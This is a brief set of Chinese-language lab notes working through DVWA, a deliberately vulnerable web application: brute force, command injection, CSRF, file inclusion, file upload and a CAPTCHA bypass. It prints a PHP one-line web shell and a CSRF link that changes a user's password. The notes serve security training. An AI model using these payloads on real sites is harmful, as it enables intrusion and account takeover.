DVWA 靶场笔记
DVWA 靶场笔记
Brute Force
登录框,Burp抓包,放到Intruder爆破即可,根据响应包的长度得到正确的密码
Command Injection
首先查看源码
请求参数 ip 会直接被拼接到 shell_exec 函数的 ping 命令中
通过构造恶意输入再传递给 shell_exec 函数,进行命令注入攻击
Cross Site Request Forgery (CSRF)
该页面的链接,点击后即可修改掉用户密码,没有任何校验
可以构造恶意网站,诱导受害者点击,即可修改TA的密码
1 | <a href="http://198.18.0.1/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Change=Change#" /> |
File Inclusion
存在文件包含漏洞
尝试包含同路径的其他文件
成功包含
File Upload
上传PHP一句话木马
1 | eval($_POST['pass']); @ |
蚁剑连上拿到shell
Insecure CAPTCHA
这里先创建Google reCAPTCHA
填入site key与secret key
审计源码可知,当CAPTCHA校验通过后,会进入到step2
Burp抓包修改为step=2即可绕过CAPTCHA校验修改掉密码